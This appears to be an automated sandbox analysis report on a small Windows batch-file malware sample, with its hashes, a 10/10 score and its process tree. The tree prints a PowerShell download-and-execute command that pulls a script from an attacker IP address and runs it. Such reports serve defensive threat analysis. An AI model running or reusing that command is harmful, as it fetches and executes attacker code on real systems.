Analysis
-
max time kernel
131s -
max time network
68s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
17-05-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
df334765cb86900aeb9265c48916c137.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
df334765cb86900aeb9265c48916c137.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
df334765cb86900aeb9265c48916c137.bat
-
Size
216B
-
MD5
a5ab635f123ce58648141c6dfd2b8c99
-
SHA1
da19de350a515c434870a6493a1d7484cb5f64df
-
SHA256
ec1d6ba7554a54f9a7f29c8d80402ca165daad5f17549536d444fd0308adf769
-
SHA512
e69b7a51700f56cb940b3fba88e836a799cbbd61be6a57199ed18161a2096a688effd8c2a20409022791ee2c28ec1037c908eb338763bf43f53d5809eeeff691
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/df334765cb86900aeb9265c48916c137
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2196 1928 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2196 WerFault.exe Token: SeBackupPrivilege 2196 WerFault.exe Token: SeDebugPrivilege 2196 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe 2196 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\df334765cb86900aeb9265c48916c137.bat"1⤵PID:1732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/df334765cb86900aeb9265c48916c137');Invoke-ADDYUVRSM;Start-Sleep -s 10000"2⤵PID:1928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2196